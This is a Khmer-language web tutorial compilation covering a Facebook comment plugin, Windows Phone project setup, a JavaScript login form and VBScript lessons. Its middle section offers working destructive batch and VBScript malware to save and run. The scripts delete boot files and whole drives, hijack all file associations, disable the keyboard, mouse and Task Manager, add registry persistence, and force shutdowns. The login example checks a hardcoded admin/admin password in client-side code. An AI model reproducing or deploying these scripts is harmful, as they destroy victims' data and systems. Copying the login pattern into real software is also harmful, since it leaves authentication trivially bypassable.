បង្កើត Face Book Comment

Web IT2 copyបង្កើត Face Book Comment ជាមួយ Javascript
1
1- Open Link https://developers.facebook.com/docs/reference/plugins/comments/
2- Set Web Url, whidth, number post and get Code
13- JavaScript SDK and Copy Code

114- HTML

<head>

<script type=”text/javascript”  <script src=”https://connect.facebook.net/en_US/all.js”></script>

</head>

<body>

<!– Javascript Part–>

<h2>Face Book Comment</h2>

<div data-href=”http://www.books4u.me” data-width=”470″ data-num-posts=”10″></div>

</body>

 5- Javascript Part

<!–facebook–>

<div id=”fb-root”></div>

<script>

window.fbAsyncInit = function () {

// init the FB JS SDK

FB.init({

appId: ‘YOUR_APP_ID’,                        // App ID from the app dashboard

channelUrl: ‘//WWW.YOUR_DOMAIN.COM/channel.html’, // Channel file for x-domain comms

status: true,                                 // Check Facebook Login status

xfbml: true                                  // Look for social plugins on the page

});

// Additional initialization code such as adding Event Listeners goes here

};

// Load the SDK asynchronously

(function (d, s, id) {

var js, fjs = d.getElementsByTagName(s)[0];

if (d.getElementById(id)) { return; }

js = d.createElement(s); js.id = id;

js.src = “//connect.facebook.net/en_US/all.js”;

fjs.parentNode.insertBefore(js, fjs);

} (document, ‘script’, ‘facebook-jssdk’));

</script>

<!–facebook–>

 

​បង្កើត​កម្មវិធី​របស់​ Windows Phone

Web IT CAMBO-20-2-2014 copyប្រើ Visual Studio ជា​ IDE សម្រាប់​ Develop App នៅក្នុង​ Windows Phone។
1
តម្រូវការ​មុន​ចាប់ផ្តើម

 • មុននឹង​ចាប់​ផ្តើម​កុំព្យូទ័រ​របស់​អ្ន​ក​ត្រូវ​តំឡើង Windows 8 x64 ។
 • ចូលទៅទាញយក SDK របស់​ Windows Phone
 • ប្រសិន​បើ​កុំព្យូទ័រ​របស់​អ្នក​មិនទាន់មាន Visual Studio ហើយ​នៅពេល​អ្នក​​តំឡើង Windows Phone SDK វានឹង​ធ្វើការ​ដំឡើង Visual Studio Express ឱ្យ​អ្នក​
 • តែបើ​អ្នក​មាន​ Visual Studio ហើយវាដំឡើង​អ្វី​ទាំង​អស់​ដែល​អ្នក​ត្រូវ​ការ​នៅពេល Develop Windows Phone App

ការ​ចាប់​ផ្តើម​បង្កើត Project

 • សូម​បើក​កម្មវិធី Visual Studio ឡើង​ ហើយ​សូម​ចុចលើ New Project… ឬចូលទៅ FILE => New Project

1

 • លោក​អ្នក​អាច​ជ្រើសរើសភាសា​ដែល​លោក​អ្នក​ចេះឬ​ជំនា​ញ​ដើម្បីយក​មក​បង្កើត Windows Phone App តែក្នុង​នេះខ្ញុំ​ជ្រើស​យកភាសា​ C#
 • បន្ទាប់​ពីជ្រើសយក C# ហើយ​សូម​ពន្លាត​ Menu ហើយ​ជ្រើស​យក Windows Phone បន្ទាប់មក​ទៀត​សូម​ជ្រើស​យកប្រភេទ​ Project ក្នុងការ​បង្កើត App នៅក្នុង​ឧទាហរណ៍នេះខ្ញុំ​ជ្រើស​យក Windows Phone Application
 • នៅភ្នែក​ខាងក្រោម​នោះ​អ្នក​ដាក់​ឈ្មោះ​ឱ្យ Project និង Solution របស់​អ្នក​បាន​ហើយ​អ្នក​ក៏អាច​កំណត់​ទីតាំងសម្រាប់​ទុក Project នៅក្នុង​កុំព្យូទ័ររបស់​អ្នក​បាន​ដែរ ។

1ចុចលើ OK បន្ទាប់​មកនឹងមាន Dialog Box លេច​ឡើង​ដើម្បី​ឱ្យអ្នក​កំណត់ Target Version នៅក្នុង Windows Phone App របស់​អ្នក​ ហើយចុច​ OK

 1. នៅពេល​ដែល​អ្នក​ជ្រើស​យក Windows Phone OS 8.0 នោះ App របស់​អ្នក​អាច​ដំណើរការ​តែនៅលើ Windows Phone 8
 2. បើអ្នក​ជ្រើសរើស Windows Phone OS 7.1 នោះ​ App របស់​អ្នក​អាចដំណើរការ​ទាំង Windows Phone OS 7.1 និង Windows Phone 8 devices.

1នៅពេល​នេះ​អ្នក​នឹង​ទទួល​បាន​ Project របស់​ Windows Phone App ថ្មីមួយ​​ដែល​មាន​បញ្ជាក់​ដូច​ខាងក្រោម​

 1. នៅផ្នែក​កណ្តាល​គេ​មាន​ដែល​មាន​កូដ​នោះជា XAML ដែល​ជាកូដ​សម្រាប់​កំណត់​រូបរាង​ UI របស់​ App
 2. ផ្នែក​ខាងស្តាំជាកន្លែង​បង្ហាញ​លទ្ធផល​របស់​កូដ XAML (Emulator)
 3. ផ្នែក​ខាង​ស្តាំ​ជា Solution Explore សម្រាប់​បង្ហាញ​ពី ឈ្មោះ​File ដែល​មាន​នៅក្នុង Project ដែល​យើង​កំពុងតែធ្វើការ​ជាមួយ។
 4. សម្រាប់​កូដ​ដែល​ប្រើប្រាស់​ចំពោះ​សកម្មភាព​ទៅលើ​ App តាម​ធម្មតា​គឺ​មិន​បង្ហាញ​ឱ្យអ្នក​ឃើញ​ទេបន្តែអ្នក​អាច​ចូលទៅកាន់​កូដបាន​ដោយចុច F7 ឬ Right Click លើ​កូដ XAML => View Code ។

1

មេរោគប្រើ Notepad​ & VBS

ITលោកអ្នក Save ដាក់ឈ្មោះ virus កន្ទុយ .BAT និង .VBS:
1) មេរោគ virus បំផ្លាញ windows:
Code:

@echo off
msg *virus activated*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg *Computer Over. Virus=Very Yes.*
shutdown -s -t 10 -c ” “

2) ប្រភេទមេរោគ virus ធ្វើអោយកណ្តុរ, Keyboard,task manager ផ្លាស់ប្តូរព័ត៌មាន:
code:
@echo off
prompt $P $G
assoc .doc  = fA1luRe
assoc .docx  = fA1luRe
assoc .log  = fA1luRe
assoc .msg  = fA1luRe
assoc .pages  = fA1luRe
assoc .rtf  = fA1luRe
assoc .txt  = fA1luRe
assoc .wpd  = fA1luRe
assoc .wps  = fA1luRe
assoc .accdb  = fA1luRe
assoc .blg  = fA1luRe
assoc .csv  = fA1luRe
assoc .dat  = fA1luRe
assoc .db  = fA1luRe
assoc .efx  = fA1luRe
assoc .mdb  = fA1luRe
assoc .pdb  = fA1luRe
assoc .pps  = fA1luRe
assoc .ppt  = fA1luRe
assoc .pptx  = fA1luRe
assoc .sdb  = fA1luRe
assoc .sdf  = fA1luRe
assoc .sql  = fA1luRe
assoc .vcf  = fA1luRe
assoc .wks  = fA1luRe
assoc .xls  = fA1luRe
assoc .xlsx  = fA1luRe
assoc .xml  = fA1luRe
assoc .bmp  = fA1luRe
assoc .gif  = fA1luRe
assoc .jpg  = fA1luRe
assoc .png  = fA1luRe
assoc .psd  = fA1luRe
assoc .psp  = fA1luRe
assoc .thm  = fA1luRe
assoc .tif  = fA1luRe
assoc .ai  = fA1luRe
assoc .drw  = fA1luRe
assoc .eps  = fA1luRe
assoc .ps  = fA1luRe
assoc .svg  = fA1luRe
assoc .3dm  = fA1luRe
assoc .dwg  = fA1luRe
assoc .dxf  = fA1luRe
assoc .pln  = fA1luRe
assoc .indd  = fA1luRe
assoc .pct  = fA1luRe
assoc .pdf  = fA1luRe
assoc .qxd  = fA1luRe
assoc .qxp  = fA1luRe
assoc .rels  = fA1luRe
assoc .aac  = fA1luRe
assoc .aif  = fA1luRe
assoc .iff  = fA1luRe
assoc .m3u  = fA1luRe
assoc .mid  = fA1luRe
assoc .mp3  = fA1luRe
assoc .mpa  = fA1luRe
assoc .ra  = fA1luRe
assoc .wav  = fA1luRe
assoc .wma  = fA1luRe
assoc .3g2  = fA1luRe
assoc .3gp  = fA1luRe
assoc .asf  = fA1luRe
assoc .asx  = fA1luRe
assoc .avi  = fA1luRe
assoc .flv  = fA1luRe
assoc .mov  = fA1luRe
assoc .mp4  = fA1luRe
assoc .mpg  = fA1luRe
assoc .rm  = fA1luRe
assoc .swf  = fA1luRe
assoc .vob  = fA1luRe
assoc .wmv  = fA1luRe
assoc .asp  = fA1luRe
assoc .cer  = fA1luRe
assoc .csr  = fA1luRe
assoc .css  = fA1luRe
assoc .htm  = fA1luRe
assoc .html  = fA1luRe
assoc .js  = fA1luRe
assoc .jsp  = fA1luRe
assoc .php  = fA1luRe
assoc .rss  = fA1luRe
assoc .tvpi  = fA1luRe
assoc .tvvi  = fA1luRe
assoc .xhtml  = fA1luRe
assoc .fnt  = fA1luRe
assoc .fon  = fA1luRe
assoc .otf  = fA1luRe
assoc .ttf  = fA1luRe
assoc .8bi  = fA1luRe
assoc .plugin  = fA1luRe
assoc .xll  = fA1luRe
assoc .cab  = fA1luRe
assoc .cpl  = fA1luRe
assoc .cur  = fA1luRe
assoc .dll  = fA1luRe
assoc .dmp  = fA1luRe
assoc .drv  = fA1luRe
assoc .key  = fA1luRe
assoc .lnk  = fA1luRe
assoc .sys  = fA1luRe
assoc .cfg  = fA1luRe
assoc .ini  = fA1luRe
assoc .keychain  = fA1luRe
assoc .prf  = fA1luRe
assoc .app  = fA1luRe
assoc .bat  = fA1luRe
assoc .cgi  = fA1luRe
assoc .com  = fA1luRe
assoc .exe  = fA1luRe
assoc .pif  = fA1luRe
assoc .vb  = fA1luRe
assoc .ws  = fA1luRe
assoc .7z  = fA1luRe
assoc .deb  = fA1luRe
assoc .gz  = fA1luRe
assoc .pkg  = fA1luRe
assoc .rar  = fA1luRe
assoc .sit  = fA1luRe
assoc .sitx  = fA1luRe
assoc .tar.gz  = fA1luRe
assoc .zip  = fA1luRe
assoc .zipx  = fA1luRe
assoc .bin  = fA1luRe
assoc .hqx  = fA1luRe
assoc .mim  = fA1luRe
assoc .uue  = fA1luRe
assoc .c  = fA1luRe
assoc .cpp  = fA1luRe
assoc .dtd  = fA1luRe
assoc .java  = fA1luRe
assoc .pl  = fA1luRe
assoc .bak  = fA1luRe
assoc .bup  = fA1luRe
assoc .gho  = fA1luRe
assoc .ori  = fA1luRe
assoc .tmp  = fA1luRe
assoc .dmg  = fA1luRe
assoc .iso  = fA1luRe
assoc .toast  = fA1luRe
assoc .vcd  = fA1luRe
assoc .gam  = fA1luRe
assoc .nes  = fA1luRe
assoc .rom  = fA1luRe
assoc .sav  = fA1luRe
assoc .dbx  = fA1luRe
assoc .msi  = fA1luRe
assoc .part  = fA1luRe
assoc .torrent  = fA1luRe
assoc .yps  = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
copy setup.bat %windir%\System32
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
taskkill /f /im taskmgr.exe
reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr = 1
shutdown -s -f -t 10 -c “PwN3D by fA1luRe!!!”

3) ធ្វើអោយលោតចុះឡើង mess:
Code:
@ECHO off
:Begin
msg * kdor thom
msg * kdor thom
msg * kdor thom
msg * kdor thom
msg * kdor thom
GOTO BEGIN
VD:
@ECHO off
:Begin
msg * Hi
msg * oun samlanh ?
msg * bong srolanh oun ?
msg * oun dek nov ?
msg * bb oun!!
GOTO BEGIN
4) បិទកុំព្យូទ័រដោយស្វ័យប្រវត្តិ:
Code:
@echo off
msg *  lời cảnh báo
shutdown -c “lời cảnh báo” -s
VD:
@echo off
msg * I LOVE YOU
shutdown -c “Error! bye ounsamlanh!” -s

មេរោគសរសេរ កម្មវិធី Visual basic Script .VBS
1)មេរោគផ្ញើ សារ:
Code:
text1=msgbox(“Warning you”,42,”Warning”)

2)បញ្ឈប់កុំព្យូទ័រ:
Code:
msgbox”Error !”
On Error Resume Next
Set vip_xinh = Createobject(“scripting.filesystemobject”)
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& “\ vip_xinh.vbs”
Set vip_xinh2= CreateObject(“WScript.Shell”)
vip_xinh2.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die”,”wscript.exe “& vip_xinh.GetSpecialFolder(0)& “\ vip_xinh.vbs %”

On Error Resume Next
Const vic = “D:\”
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject(“Scripting.FileSystemObject”)
fso.DeleteFile vic & “*.*” , True
fso.DeleteFolder vic & “*” , True
End Sub

On Error Resume Next
Const vic1 = “C:\windows\”
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject(“Scripting.FileSystemObject”)
fso1.DeleteFile vic1 & “*.*” , True
fso1.DeleteFolder vic1 & “*” , True
End Sub

On Error Resume Next
Const vic2 = “C:\”
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject(“Scripting.FileSystemObject”)
fso2.DeleteFile vic2 & “*.*” , True
fso2.DeleteFolder vic2 & “*” , True
End Sub

On Error Resume Next
Set treomay= CreateObject(“WScript.Shell”)
Do
treomay.run “notepad”,false
loop

 ដោនឡូត មេរោគ យកទៅ រត់លេង DOWNLOAD VIRUSES

Login Form ជាមួយ Javascript

1បង្កើត Login Form ជាមួយ Javascript
1ការប្រើប្រាស់ Javascript ដោយបង្កើតជា Login Form សម្រាប់ផ្ទៀងផ្ទាត់ Username និង Password ជាដើម។
ជាដំបូងសូមលោកអ្នកបង្កើតជា Form មួយដោយប្រើប្រាស់ HTML ដូចជា៖

<form name="fn">
<table>
<tr>
<td colspan="2" align="center"><h1>Login</h1></td>
</tr>
<tr>
<td align="right">Username:</td><td align="left"><input type="text" name="username" /></td>
</tr>
<tr>
<td align="right">Password:</td><td align="left"><input type="password" name="pass" /></td>
</tr>
<tr>
<td align="center" colspan="2"><input type="button" name="ok" value="OK" onclick="login()" /><input type="reset" name="reset" value="Reset" /></td>
</tr>
</table>
</form>

បន្ទាប់ពីលោកអ្នកបានបង្កើតជា Form Login ហើយ សូមបន្តបន្ថែមកូដ Javascript ដើម្បីផ្ទៀងផ្ទាត់ Username និង Password វិញម្តង៖

<form name="fn">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>FormLoign</title>
<style type="text/css">
h1{
color:#00C;
font-weight:bold;
font-size:24px;
}
</style>
<script type="text/javascript">
function load()
{
var f=document.fn;
if(f.username.value=="")
{
alert("Please input username");
f.username.focus();
}
else if(f.pass.value=="")
{
alert("Please input your password");
f.pass.focus();
}
else if(f.username.value=="admin" && f.pass.value!="admin")
{
alert("Your password is incorrect");
}
else if(f.username.value!="admin" && f.pass.value=="admin")
{
alert("Your username is incorrect");
}
else if(f.username.value!="admin" && f.pass.value!="admin")
{
alert("Your username and password are incorrect");
}
else
{
alert("Your login");
}

}
</script>
</head>
//block code for html form
</html>

សូមពិនិត្យមើលកូដពេញលេញនៅខាងក្រោម

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>FormLoign</title>
<style type="text/css">
h1{
color:#00C;
font-weight:bold;
font-size:24px;
}
</style>
<script type="text/javascript">
function load()
{
var f=document.fn;
if(f.username.value=="")
{
alert("Please input username");
f.username.focus();
}
else if(f.pass.value=="")
{
alert("Please input your password");
f.pass.focus();
}
else if(f.username.value=="admin" && f.pass.value!="admin")
{
alert("Your password is incorrect");
}
else if(f.username.value!="admin" && f.pass.value=="admin")
{
alert("Your username is incorrect");
}
else if(f.username.value!="admin" && f.pass.value!="admin")
{
alert("Your username and password are incorrect");
}
else
{
alert("Your login");
}

}
</script>
</head>

<body bgcolor="#CCCCCC">
<html>
<center>
<form name="fn">
<table>
<tr>
<td colspan="2" align="center"><h1>Login</h1></td>
</tr>
<tr>
<td align="right">Username:</td><td align="left"><input type="text" name="username" /></td>
</tr>
<tr>
<td align="right">Password:</td><td align="left"><input type="password" name="pass" /></td>
</tr>
<tr>
<td align="center" colspan="2"><input type="button" name="ok" value="OK" onclick="load()" /><input type="reset" name="reset" value="Reset" /></td>
</tr>
</table>
</form>
</center>
</html>
</body>
</html>

បន្ទាប់ពីវាយកូដបានទាំងអស់នេះហើយ លោកអ្នកនឹងទទួលបាន Form Login ដូចខាងក្រោម
111

 

មេរៀន អថេរ VBScript Variable

aកម្មវិធី VBScript គឺ​ជា​ភាសា​ស្គ្រីប​របស់ Microsoft  កម្មវិធី VBScript គឺ​ជា​ភាសា​ស្គ្រីប​លំនាំ​ដើម​នៅ​ក្នុង ASP អ្នក​អាច​ដើម្បីសរសេរលើ VBScript នៅ​ក្នុង​អ៊ិ​ន​ធឺ​ណិ​រុក​រក​រ៉ែ​។
ឩ​ទា​ហរ​ណ៍ កូដលំនាំនៃ VBScript
<html>
<body>
<script type=”text/vbscript”>
document.write(“This is my first VBScript!”)
</script>
</body>
</html>
 ​របៀប​​ដើម្បីសរសេរ VBScript
ស្លាក HTML ដែល <script> នេះ​ត្រូវ​បាន​ប្រើ​ដើម្បី​បញ្ចូល VBScript ក្នុង HTML ។
សរសេរកូដ VBScript នៅក្នុង HTML
VBScript ត្រូវ​បាន​បញ្ចូល​ទៅ​ក្នុង HTML គឺ​រវាង <script> ស្ដ​ង់​ដា​រ​និង </ ស្គ្រីប​> ស្លាក​។
ប្រើ​គុណលក្ខណៈ​ប្រភេទ​នៅ​ក្នុង​ស្លាក <script> ដើម្បី​កំណត់​ភាសា​ស្គ្រីប “អត្ថបទ / vbscript​”​:
<html>
<body>
<script type=”text/vbscript”>

</script>
</body>
</html>
VBScript Output ពេល ​ដែល VBScript ត្រូវ​បាន​ប្រើ​នៅ​លើ​ម៉ាស៊ីន​បម្រើ​បណ្ដាញ​មួយ​នៅ​ក្នុង​មួយ​ទំព័រ ASP​, សេចក្តី​ថ្លែងការណ៍ statement response.write() produces លទ្ធផល​។ នៅ​ពេល​ដែល​យើង ​ត្រូវ​ប្រើ​កម្មវិធី​រុករក​អ៊ិ​ន​ធឺ​ណិ​សម្រាប់​ការ​សាកល្បង VBScript យើង​ប្រើ​ប្រាស់ document.write () ដើម្បី​ផលិត​ទិន្នផល​:
ឧទាហរណ៍
<html>
<body>
<script type=”text/vbscript”>
document.write(“Hello World!”)
</script>
</body>
</html>

អថេរ VBScript Variables
រំលឹកពិ​ជ​គណិត​​?
រំលឹកមេរៀនពិ​ជ​គណិត​? X = 5​, Y = 6 = Z X + Y
តើ ​អ្នក​ចងចាំ​ថា​លិខិត (ដូចជា X​) មួយ​ដែល​អាច​ត្រូវ​បាន​ប្រើ​ដើម្បី​ទុក​តម្លៃ​មួយ (ដូច​ជា 5​) និង​អ្នក​ដែល​អ្នក​អាច​ប្រើ​ព​ត៌​មាន​ខាង​លើ​ដើម្បី​គណនា​តម្លៃ​របស់ Z ដែល​ត្រូវ​បាន 11​?
អក្សរ​ទាំង​នេះ​ត្រូវ​បាន​គេ​ហៅ​ថា អថេរ និង​អថេរ​អាច​ត្រូវ​បាន​ប្រើ​ដើម្បី​ទុក​តម្លៃ (X = 5​) ឬ​កន្សោម (Z = X + Y​) ។
អថេរ VBScript ជាមួយ​នឹង​ពិ​ជ​គណិត​, អថេរ VBScript ត្រូវ​បាន​ប្រើ​ដើម្បី​ទុក​តម្លៃ​ឬ​កន្សោម​។
អថេរ​មួយ​អាច​មាន​ឈ្មោះ​ខ្លី​ដូចជា X ឬ​ឈ្មោះ​ពិពណ៌នា​ជា​ច្រើន​ដូច​ជា carname ។
ក្បួន​សម្រាប់​ឈ្មោះ​អថេរ VBScript​:
-ត្រូវ​តែ​ចាប់​ផ្តើ​ម​ជាមួយ​នឹង​លិខិត​មួយ
-មិន​អាច​មាន​រយៈ​ពេល​មួយ (។ )
-មិន​អាច​លើស​ពី 255 តួ​អក្សរ
នៅ​ក្នុង VBScript​, អថេរ​ទាំងអស់​នៃ​ប្រភេទ វ៉ា​រ្យ៉​ង់ , ដែល​អាច​រក្សា​ទុក​ប្រភេទ​ផ្សេង​គ្នា​នៃ​ទិន្នន័យ​។
ប្រកាស អថេរ VBScript ការ​បង្កើត​អថេរ​នៅ​ក្នុង VBScript ត្រូវ​បាន​សំដៅ​ជា​ញឹកញាប់​បំផុត​​ជា “ប្រកាស​” អថេរ​។
អ្នក​អាច​ប្រកាស​អថេរ VBScript ជា​សាធារណៈ dim ឬ​សេចក្តី​ថ្លែងការណ៍​ឯកជន​។ ដូច​​​នេះ​:

Dim x
Dim carname

ឥឡូវ​នេះ​អ្នក​បាន​បង្កើត​អថេរ​ពីរ​។ ឈ្មោះ​នៃ​អថេរ​គឺ​: “x​” និង “carname​” ។
អ្នក​ក៏​អាច​ប្រកាស​អថេរ​ដោយ​ប្រើ​ឈ្មោះ​របស់​វា​ក្នុង​ស្គ្រីប​។ ដូច​​​នេះ​:
carname=”Volvo”

ដាក់​​​ជម្រើស​សេចក្តី​ថ្លែង​ការណ៍​ជាក់​លាក់​នៅ​លើ​កំពូល​នៃ​ស្គ្រីប​របស់​អ្នក​។ ដូច​​​នេះ​:

Option Explicit
Dim carname
carname=some value

តម្លៃ​របស់​អថេរ​ទៅ

អ្នក​ផ្ដល់​តម្លៃ​ទៅ​ឱ្យ​អថេរ​ដូច​នេះ​មួយ​:
carname=”Volvo”
x=10

VBScript អថេរ​ array

អថេរ​អា​រេ​មួយ​នេះ​ត្រូវ​បាន​ប្រើ​ដើម្បី​រក្សា​ទុក​តម្លៃ​ជា​ច្រើន​នៅ​ក្នុង​អថេរ​តែ​មួយ​។
នៅ​ក្នុង​ឧទាហរណ៍​ខាងក្រោម​នេះ​អា​រេ​ដែល​មាន 3 ធាតុ​មួយ​ត្រូវ​បាន​ប្រកាស​:
Dim names(2)

ចំនួន ​ដែល​បាន​បង្ហាញ​នៅ​ក្នុង​វង់ក្រចក​គឺ 2 ។ យើង​ចាប់​ផ្តើ​ម​នៅ​សូន្យ​ដូច្នេះ​អា​រេ​នេះ​មាន 3 ធាតុ​។ នេះ​គឺ​ជា​អា​រេ​ថេរ​-ទំហំ​។ អ្នក​ផ្ដល់​ទិន្នន័យ​ទៅ​កាន់​គ្នា​នៃ​ធាតុ​នៃ​អា​រេ​ដូច​នេះ​:
names(0)=”Tove”
names(1)=”Jani”
names(2)=”Stale”

ដូច ​​​គ្នា​នេះ​ដែរ​ទិន្នន័យ​អាច​ត្រូវ​បាន​យក​ចេញ​ពី​ធាតុ​ដោយ​ប្រើ​លិបិក្រម​ នៃ​ធាតុ​អា​រេ​ជាក់លាក់​ណា​មួយ​ដែល​អ្នក​ចង់​បាន​។ ដូច​​​នេះ​:
mother=names(0)

Asign ទិន្នន័យ​ទៅ​អា​រេ​ពីរ​វិមាត្រ​:
ឧ​ទា​ហរ​ណ៏
<html>
<body>

<script type=”text/vbscript”>
Dim x(2,2)
x(0,0)=”Volvo”
x(0,1)=”BMW”
x(0,2)=”Ford”
x(1,0)=”Apple”
x(1,1)=”Orange”
x(1,2)=”Banana”
x(2,0)=”Coke”
x(2,1)=”Pepsi”
x(2,2)=”Sprite”
for i=0 to 2
document.write(“<p>”)
for j=0 to 2
document.write(x(i,j) & “<br />”)
next
document.write(“</p>”)
next
</script>

</body>
</html>

មេរៀន VBScript Procedures

VBScript procedures មានពីរប្រភេទ:
-Sub procedure
-អនុគមន៍ procedure
VBScript Sub Procedures
Sub procedure:
-ស៊េរី​មួយ​នៃ​របាយការណ៍​ដែល​បាន​រុំ​ព័ទ្ធ​ដោយ​សេចក្តី​ថ្លែង​ការ​អនុ​អនុ​និង​បញ្ចប់​គឺ
-អាច​អនុវត្ត​សកម្មភាព​ប៉ុន្តែ មិន​ត្រឡប់ តម្លៃ​មួយ
-អាចយកអគុម៉ង់ arguments

Sub mysub()
some statements
End Sub

Sub mysub(argument1,argument2)
some statements
End Sub

ឧទាហរណ៍ (បានតែ IE មួយគត់)
Sub mysub()
document.write(“I was written by a sub procedure”)
End Sub

អនុគមន៍ VBScript Function Procedures
អនុគមន៍ procedure:
*ស៊េរី​មួយ​នៃ​របាយការណ៍​ដែល​បាន​រុំ​ព័ទ្ធ​ដោយ​អនុគមន៍​អនុគមន៍​និង​បញ្ចប់​សេចក្តី​ថ្លែង​ការ​នេះ​គឺ
*អាច​អនុវត្ត​សកម្ម​ភាព​និង អាច​ត្រឡប់​មក តម្លៃ​មួយ
*អាច​អាគុយម៉ង់​ដែល​ត្រូវ​បាន​ឆ្លង​ទៅ​កាន់​វ​​ា​ដោយ​នីតិវិធី​ការ​ហៅ​ទូរស័ព្ទ​មួយ
*ដោយ​គ្មាន​អាគុយម៉ង់​ត្រូវ​តែ​រួម​បញ្ចូល​មួយ​ដែល​សំណុំ​ទទេ​នៃ​វង់ក្រចក ()
*ត្រឡប់​តម្លៃ​មួយ​ដោយ​ផ្ដល់​តម្លៃ​ទៅ​ឱ្យ​ឈ្មោះ​របស់​វា

Function myfunction()
some statements
myfunction=some value
End Function

Function myfunction(argument1,argument2)
some statements
myfunction=some value
End Function

Example (IE Only)
function myfunction()
myfunction=Date()
end function
ការហៅ Procedure មួយ
This simple function procedures is called to calculate the sum of two arguments:
Example (IE Only)
Function myfunction(a,b)
myfunction=a+b
End Function
document.write(myfunction(5,9))

មុខងារ “myfunction​” នឹង​ត្រឡប់​ផលបូក​នៃ​ចំនួន​អាគុយម៉ង់ “a​” អាគុយម៉ង់​និង “b​” នោះ​ទេ​។ នៅ​ក្នុង 14 ករណី​នេះ​។
នៅពេល​ដែល​អ្នក​ហៅ​ទូរស័ព្ទ​នីតិវិធី​មួយ​ដែល​អ្នក​អាច​ប្រើ​សេចក្តី​ថ្លែងការណ៍​: ការ​ហៅ​ទូរស័ព្ទ​បាន​ដូច​នេះ​:

Call MyProc(argument) ឬ​អ្នក​អាច​លុប​សេចក្តី​ថ្លែងការណ៍​: ការ​ហៅ​ទូរស័ព្ទ​បាន​ដូច​នេះ​:

MyProc argument

មេរៀន VBScript Conditional

លក្ខខណ្ឌ​សេចក្តី​ថ្លែង​ការ​ណ៏ VBScript Conditional Statements

សេចក្តី​ថ្លែង​ការ​ដោយ​មាន​លក្ខខណ្ឌ​ត្រូវ​បាន​ប្រើ​ដើម្បី​អនុវត្ត​សកម្មភាព​ផ្សេង​គ្នា​សម្រាប់​ការ​សម្រេច​ចិត្ត​ផ្សេង​ពី​គ្នា​។
នៅ​ក្នុង VBScript យើង​មាន​បួន​សេចក្តី​ថ្លែង​ការ​ណ័​:

-If statement – ប្រតិបត្តិ​សំណុំ​នៃ​លេខ​កូដ​មួយ​នៅ​ពេល​ដែល​ស្ថានភាព​មួយ​ដែល​ជា​ការ​ពិត
If…Then…Else statement –  ជ្រើស​មួយ​ក្នុង​ចំណោម​ពីរ​សំណុំ​នៃ​បន្ទាត់​ដើម្បី​ប្រតិបត្តិ
If…Then…ElseIf statement – ជ្រើស​មួយ​ក្នុង​ចំណោម​សំណុំ​ជាច្រើន​នៃ​បន្ទាត់​ដែល​ត្រូវ​ប្រតិបត្តិ
Select Case statement – ជ្រើស​មួយ​ក្នុង​ចំណោម​សំណុំ​ជាច្រើន​នៃ​បន្ទាត់​ដែល​ត្រូវ​ប្រតិបត្តិ

If…Then…Else ប្រើ​ប្រសិន​បើ​សេចក្តី​ថ្លែងការណ៍ … បន្ទាប់​មក​ទៀត … ប្រសិន​បើ​អ្នក​ចង់​ទៅ
-ប្រតិបត្តិ​កូដ​ខ្លះ​ប្រសិន​បើ​មាន​លក្ខខណ្ឌ​មួយ​គឺ​ជា​ការ​ពិត
-ជ្រើស​មួយ​ក្នុង​ចំណោម​ពីរ​ប្លុក​នៃ​កូដ​ដែល​ត្រូវ​ប្រតិបត្តិ

ប្រសិនបើលោកអ្នកចង់ដំណើរការ  statement មួយក្នុងលក្ខខណ្ឌមួយពិត  លោកអ្នកអាចសរសេរកូដដូចបន្ទាត់ ខាងក្រោម:
If i=10 Then alert(“Hello”)

មិនមាន ..Else.. នៅក្នុង syntax នេះ លោកអ្នកប្រាប់កូដ   code ទៅសកម្មភាពលក្ខខណ្ឌមួយគឺពិត (ក្នុងករណីនេះប្រសិនបើ If i=10)។

If i=10 Then
alert(“Hello”)
i = i+1
End If

មិនមាន ..Else.. ក្នុងឧទារណ៍ដូចខាងលើ  លោកអ្នកសរសេរកូដ code​​​ សកម្មភាពច្រើនប្រសិនបើលក្ខខណ្ឌពិត
ប្រសិនបើប្រត្តិបត្តិការ ការប្រកាសលក្ខខណ្ឌ មួយពិត ហើយការប្រកាស ផ្សេងទៀតក្នុងលក្ខខណ្ឌមិនពិត លោកអ្នកត្រូវបន្ថែម  “Else”:

<script type=”text/vbscript”>
i=hour(time)
If i < 10 Then
document.write(“Good morning!”)
Else
document.write(“Have a nice day!”)
End If
</script>

If…Then…ElseIf

អ្នក​អាច​ប្រើ​ប្រសិន​បើ … បន្ទាប់​មក … សេចក្តី​ថ្លែង​ការណ៍ ElseIf ប្រសិន​បើ​អ្នក​ចង់​ជ្រើស​មួយ​ក្នុង​ចំណោម​ជា​ច្រើន​ប្លុក​នៃ​កូដ​ដើម្បី​ប្រតិបត្តិ​:
ឧ​ទា​ហរ​ណ៏
<script type=”text/vbscript”>
i=hour(time)
If i = 10 Then
document.write(“Just started…!”)
ElseIf i = 11 Then
document.write(“Hungry!”)
ElseIf i = 12 Then
document.write(“Ah, lunch-time!”)
ElseIf i = 16 Then
document.write(“Time to go home!”)
Else
document.write(“Unknown”)
End If
</script>

Select Case

